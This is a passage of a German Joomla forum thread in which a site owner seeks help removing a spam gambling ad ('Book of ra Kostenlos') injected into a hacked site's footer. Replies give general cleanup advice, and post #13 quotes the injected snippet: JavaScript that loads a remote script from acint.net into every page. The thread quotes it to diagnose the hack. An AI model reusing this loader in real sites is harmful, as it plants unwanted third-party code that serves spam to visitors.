+ Antworten
Seite 2 von 2 ErsteErste 1 2
Ergebnis 11 bis 14 von 14

Thema: Fremde Anzeige im footer-Bereich ("Book of ra Kostenlos")

  1. #11
    Wohnt hier Avatar von JoomlaWunder
    Registriert seit
    03.03.2010
    Ort
    Nordseeküste
    Beiträge
    4.918
    Bedankte sich
    201
    Erhielt 1.252 Danksagungen
    in 1.219 Beiträgen

    Standard

    Ein zusätzlicher Backend-Schutz sollte für jeder Seite angelegt sein, die auf einem Webserver liegt (lokal natürlich nicht).
    Ein zusätzlicher Schutz im Joomla-Root (also für Backend und Frontend) sollte bei jeder gehackten Seite sofort realisiert werden.

    Ob dein Backup hackfrei ist, kann dir aus der Ferne niemand beantworten.
    Hinweise auf gehackte Dateien können beispielsweise die Zeitstempel der Dateien auf dem Webserver liefern. Ebenso lassen sich Dateien vergleichen und so Änderungen ausfindig machen. Prinzipiell können auch Bilder, PDF .... usw. sowie die DB-Tabellen Schadcode enthalten. Das Ganze ist also nicht ganz trivial. Auf der anderen Seite gab es auch schon Hacks, wo immer 2 bis 3 bestimmte Dateien betroffen waren und man mit dem Löschen bzw. Austauschen dieser Dateien bereits den Hack beseitigen konnte.
    Geändert von JoomlaWunder (12.06.2019 um 12:21 Uhr)
    Gruß!
    JoomlaWunder
    Kein Support per PN!
    Konnte ich helfen? -> Dann bitte den "Danke"-Button klicken!

  2. Erhielt Danksagungen von:


  3. #12
    War schon öfter hier Avatar von lemur
    Registriert seit
    15.07.2008
    Beiträge
    161
    Bedankte sich
    31
    Erhielt 5 Danksagungen
    in 4 Beiträgen

    Standard

    Zitat Zitat von faro02 Beitrag anzeigen
    Um das jedoch genau festzustellen, muss sich ein Profi für Webseitenbereinigung die komplette Installation genau ansehen.
    Danke.
    Gibt es hier solche Profies auf dem Forum?
    Was würde so eine Arbeit kosten?
    Schreiben sie bitte darüber (wenn nicht direckt ins Thema) in Private Nachrichten.
    geschichte-chronologie.de

  4. #13
    War schon öfter hier Avatar von lemur
    Registriert seit
    15.07.2008
    Beiträge
    161
    Bedankte sich
    31
    Erhielt 5 Danksagungen
    in 4 Beiträgen

    Standard

    Hallo,

    ich habe den einzigen Unterschied zwieschen Quellcode der gehackten (in offline) und der "ge-backup-ten" Webseiten gefunden.
    In gehackten gibt es noch die Zeilen:

    <!--
    var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
    //-->
    </script>
    Kann man damit diese versteckte funktion in php-Code finden und entfernen bitte?
    geschichte-chronologie.de

  5. #14
    Wohnt hier Avatar von gottypower
    Registriert seit
    19.11.2005
    Ort
    im Core
    Alter
    54
    Beiträge
    2.089
    Bedankte sich
    63
    Erhielt 624 Danksagungen
    in 588 Beiträgen

    Standard

    Könnte man bestimmt... Wichtig wäre halt auch das Tor zu finden wie der Schadcode in die Installation gelangt ist und dieses sofort schlissen, sonst ist die ganze Arbeit umsonst.

    Wie schon meine Vorredner geschrieben haben, solltes du dir professionelle Hilfe einkaufen. Falls sich aktuell noch keine bei dir gemeldet hat, kannst du auch mich gerne per PN anschreiben.
    Einfach kann jeder...

    und immer schön danke sagen

+ Antworten
Seite 2 von 2 ErsteErste 1 2

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein